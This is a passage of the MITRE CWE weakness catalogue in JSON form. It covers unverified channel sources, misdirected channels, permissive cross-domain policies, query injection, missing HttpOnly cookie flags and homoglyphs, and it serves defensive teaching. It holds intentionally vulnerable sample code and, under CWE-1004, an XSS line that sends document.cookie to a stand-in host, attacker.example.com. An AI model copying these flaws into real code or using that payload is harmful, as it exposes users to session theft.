actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5726"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-938"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-01-14"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"940":{"attr":{"@_ID":"940","@_Name":"Improper Verification of Source of a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.","Extended_Description":"When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"594"}},{"attr":{"@_CAPEC_ID":"595"}},{"attr":{"@_CAPEC_ID":"596"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":{"#text":"While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any \\"user\\" in such cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"941":{"attr":{"@_ID":"941","@_Name":"Incorrectly Specified Destination in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.","Extended_Description":{"xhtml:p":["Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service.","There are at least two distinct weaknesses that can cause the software to communicate with an unintended destination:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If the software allows an attacker to control which destination is specified, then the attacker can cause it to connect to an untrusted or malicious destination. For example, because UDP is a connectionless protocol, UDP packets can be spoofed by specifying a false source address in the packet; when the server receives the packet and sends a reply, it will specify a destination by using the source of the incoming packet - i.e., the false source. The server can then be tricked into sending traffic to the wrong host, which is effective for hiding the real source of an attack and for conducting a distributed denial of service (DDoS). As another example, server-side request forgery (SSRF) and XML External Entity (XXE) can be used to trick a server into making outgoing requests to hosts that cannot be directly accessed by the attacker due to firewall restrictions.","If the software incorrectly specifies the destination, then an attacker who can control this destination might be able to spoof trusted servers. While the most common occurrence is likely due to misconfiguration by an administrator, this can be resultant from other weaknesses. For example, the software might incorrectly parse an e-mail or IP address and send sensitive data to an unintended destination. As another example, an Android application may use a \\"sticky broadcast\\" to communicate with a receiver for a particular application, but since sticky broadcasts can be processed by *any* receiver, this can allow a malicious application to access restricted data that was only intended for a different application."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"406","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"},{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-941"}},{"attr":{"@_External_Reference_ID":"REF-942"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"942":{"attr":{"@_ID":"942","@_Name":"Permissive Cross-domain Policy with Untrusted Domains","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cross-domain policy file that includes domains that should not be trusted.","Extended_Description":{"xhtml:p":["A cross-domain policy file (\\"crossdomain.xml\\" in Flash and \\"clientaccesspolicy.xml\\" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made.","Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains.","An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site.","In many cases, the attack can be launched without the victim even being aware of it."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"183","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Varies by Context"],"Note":"An attacker may be able to bypass the web browser\'s same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data:","Body_Text":["Flash crossdomain.xml :","Silverlight clientaccesspolicy.xml :","These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;cross-domain-policy xmlns:xsi=\\"http://www.w3.org/2001/XMLSchema-instance\\"xsi:noNamespaceSchemaLocation=\\"http://www.adobe.com/xml/schemas/PolicyFile.xsd\\"&gt;&lt;allow-access-from domain=\\"*.example.com\\"/&gt;&lt;allow-access-from domain=\\"*\\"/&gt;&lt;/cross-domain-policy&gt;","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\" encoding=\\"utf-8\\"?&gt;&lt;access-policy&gt;&lt;cross-domain-access&gt;&lt;policy&gt;&lt;allow-from http-request-headers=\\"SOAPAction\\"&gt;&lt;domain uri=\\"*\\"/&gt;&lt;/allow-from&gt;&lt;grant-to&gt;&lt;resource path=\\"/\\" include-subpaths=\\"true\\"/&gt;&lt;/grant-to&gt;&lt;/policy&gt;&lt;/cross-domain-access&gt;&lt;/access-policy&gt;","xhtml:br":["","","","","","","","","","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2292","Description":"Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2292"},{"Reference":"CVE-2014-2049","Description":"The default Flash Cross Domain policies in a product allows remote attackers to access user files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2049"},{"Reference":"CVE-2007-6243","Description":"Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243"},{"Reference":"CVE-2008-4822","Description":"Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4822"},{"Reference":"CVE-2010-3636","Description":"Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3636"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-943"}},{"attr":{"@_External_Reference_ID":"REF-944"}},{"attr":{"@_External_Reference_ID":"REF-945"}},{"attr":{"@_External_Reference_ID":"REF-946"}},{"attr":{"@_External_Reference_ID":"REF-947"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-05","Submission_Comment":"Created by MITRE with input from members of the CWE-Research mailing list."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name"}],"Previous_Entry_Name":{"#text":"Overly Permissive Cross-domain Whitelist","attr":{"@_Date":"2020-02-26"}}}},"943":{"attr":{"@_ID":"943","@_Name":"Improper Neutralization of Special Elements in Data Query Logic","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.","Extended_Description":{"xhtml:p":["Depending on the capabilities of the query language, an attacker could inject additional logic into the query to:","The ability to execute additional commands or change which entities are returned has obvious risks. But when the application logic depends on the order or number of entities, this can also lead to vulnerabilities. For example, if the application query expects to return only one entity that specifies an administrative user, but an attacker can change which entities are returned, this could cause the logic to return information for a regular user and incorrectly assume that the user has administrative privileges.","While this weakness is most commonly associated with SQL injection, there are many other query languages that are also subject to injection attacks, including HTSQL, LDAP, DQL, XQuery, Xpath, and \\"NoSQL\\" languages."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Modify the intended selection criteria, thus changing which data entities (e.g., records) are returned, modified, or otherwise manipulated","Append additional commands to the query","Return more entities than intended","Return fewer entities than intended","Cause entities to be sorted in an unexpected way"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Bypass Protection Mechanism","Read Application Data","Modify Application Data","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2503","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2503"},{"Reference":"CVE-2014-2508","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2508"}]},"Notes":{"Note":{"#text":"It could be argued that data query languages are effectively a command language - albeit with a limited set of commands - and thus any query-language injection issue could be treated as a child of CWE-74. However, CWE-943 is intended to better organize query-oriented issues to separate them from fully-functioning programming languages, and also to provide a more precise identifier for the many query languages that do not have their own CWE identifier.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1004":{"attr":{"@_ID":"1004","@_Name":"Sensitive Cookie Without \'HttpOnly\' Flag","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.","Extended_Description":"The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker\'s script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"An HTTP cookie is a small piece of data attributed to a specific website and stored on the user\'s computer by the user\'s web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website\'s server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties."},{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Leverage the HttpOnly flag when setting a sensitive cookie in a response.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.","Body_Text":["The snippet of code below establishes a new cookie to hold the sessionID.","The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:","When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.","To mitigate the risk, use the setHttpOnly(true) method."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);response.addCookie(c);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"document.write(\'&lt;img src=\\"http://attacker.example.com/collect-cookies?cookie=\' + document.cookie . \'\\"&gt;\'"},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);c.setHttpOnly(true);response.addCookie(c);","xhtml:br":["","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-3852","Description":"CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3852"},{"Reference":"CVE-2015-4138","Description":"Appliance for managing encrypted communications does not use HttpOnly flag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4138"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-2"}},{"attr":{"@_External_Reference_ID":"REF-3"}},{"attr":{"@_External_Reference_ID":"REF-4"}},{"attr":{"@_External_Reference_ID":"REF-5"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-01-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"1007":{"attr":{"@_ID":"1007","@_Name":"Insufficient Visual Distinction of Homoglyphs Presented to User","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action.","Extended_Description":{"xhtml:p":["Some glyphs, pictures, or icons can be semantically distinct to a program, while appearing very similar or identical to a human user. These are referred to as homoglyphs. For example, the lowercase \\"l\\" (ell) and uppercase \\"I\\" (eye) have different character codes, but these characters can be displayed in exactly the same way to a user, depending on the font. This can also occur between different character sets. For example, the Latin capital letter \\"A\\" and the Greek capital letter \\"\u0391\\" (Alpha) are treated as distinct by programs, but may be displayed in exactly the same way to a user. Accent marks may also cause letters to appear very similar, such as the Latin capital letter grave mark \\"\xc0\\" and its equivalent \\"\xc0\\" with the acute accent.","Adversaries can exploit this visual similarity for attacks such as phishing, e.g. by providing a link to an attacker-controlled hostname that looks like a hostname that the victim trusts. In a different use of homoglyphs, an adversary may create a back door username that is visually similar to the username of a regular user, which then makes it more difficult for a system administrator to detect the malicious username while reviewing logs."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Homograph Attack","Description":"\\"Homograph\\" is often used as a synonym of \\"homoglyph\\" by researchers, but according to Wikipedia, a homograph is a word that has multiple, distinct meanings."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when characters from various character sets are allowed to be interchanged within a URL, username, email address, etc. without any notification to the user or underlying system being used."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Other","Note":"An attacker may ultimately redirect a user to a malicious website, by deceiving the user into believing the URL they are accessing is a trusted domain. However, the attack can also be used to forge log entries by using homoglyphs in usernames. Homoglyph manipulations are often the first step towards executing advanced attacks such as stealing a user\'s credentials, Cross-Site Scripting (XSS), or log forgery. If an attacker redirects a user to a malicious site, the attacker can mimic a trusted domain to steal account credentials and perform actions on behalf of the user, without the user\'s knowledge. Similarly, an attacker could create a username for a website that contains homoglyph characters, making it difficult for an admin to review logs and determine which users performed which actions."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"If utilizing user accounts, attempt to submit a username that contains homoglyphs. Similarly, check to see if links containing homoglyphs can be sent via email, web browsers, or other mechanisms.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["Use a browser that displays Punycode for IDNs in the URL and status bars, or which color code various scripts in URLs.","Due to the prominence of homoglyph attacks, several browsers now help safeguard against this attack via the use of Punycode. For example, Mozilla Firefox and Google Chrome will display IDNs as Punycode if top-level domains do not restrict which characters can be used in domain names or if labels mix scripts for different languages."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Use an email client that has strict filters and prevents messages that mix character sets to end up in a user\'s inbox.","Certain email clients such as Google\'s GMail prevent the use of 